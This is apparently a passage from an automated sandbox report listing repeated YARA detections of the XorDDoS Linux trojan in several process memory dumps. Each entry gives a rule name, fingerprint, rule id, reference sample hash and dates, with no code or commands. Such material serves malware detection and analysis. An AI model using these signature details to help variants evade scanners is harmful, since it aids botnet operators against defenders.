        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
